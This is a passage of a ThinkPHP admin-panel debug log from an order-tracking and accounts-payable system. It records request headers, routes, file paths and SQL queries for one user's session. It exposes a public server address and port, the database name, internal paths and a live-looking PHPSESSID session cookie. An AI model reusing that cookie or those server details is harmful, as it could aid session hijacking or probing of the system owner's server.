3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000585s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001532s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000630s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001468s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001106s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001787s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000384s ] --------------------------------------------------------------- [ 2022-07-20T17:20:41+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308840 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308840 [运行时间:0.033463s][吞吐率:29.88req/s] [内存消耗:3,854.94kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001261s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308840', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001702s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:27:46+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.054124s][吞吐率:18.48req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001134s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001717s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/add.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000122s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000556s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001417s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000612s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001444s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001183s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001728s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000378s ] --------------------------------------------------------------- [ 2022-07-20T17:27:47+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309266 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309266 [运行时间:0.035841s][吞吐率:27.90req/s] [内存消耗:3,854.94kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001175s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658309266', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001639s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:27:49+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/addyifu?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1 [运行时间:0.055842s][吞吐率:17.91req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001149s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'addyifu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001847s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->addyifu[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/addyifu.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000614s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001777s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000450s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001237s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001115s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001632s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000403s ] --------------------------------------------------------------- [ 2022-07-20T17:27:49+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309269 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309269 [运行时间:0.037011s][吞吐率:27.02req/s] [内存消耗:3,854.60kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001659s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658309269', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002376s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:27:52+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1 [运行时间:0.056322s][吞吐率:17.76req/s] [内存消耗:5,261.61kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001925s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001688s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/choosecustom.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000536s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001426s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000439s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001071s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001379s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001900s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000462s ] --------------------------------------------------------------- [ 2022-07-20T17:27:52+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309272 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309272 [运行时间:0.034656s][吞吐率:28.85req/s] [内存消耗:3,854.64kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001117s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658309272', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001622s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000119s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:27:53+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658309272797 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658309272797 [运行时间:0.074144s][吞吐率:13.49req/s] [内存消耗:5,683.39kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001142s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658309272797', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001539s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000109s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000403s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001671s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000691s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001524s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001133s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001723s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000413s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001415s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000994s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000963s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.000960s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.002520s ] --------------------------------------------------------------- [ 2022-07-20T17:27:53+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.111509s][吞吐率:8.97req/s] [内存消耗:5,438.78kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001640s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '33', 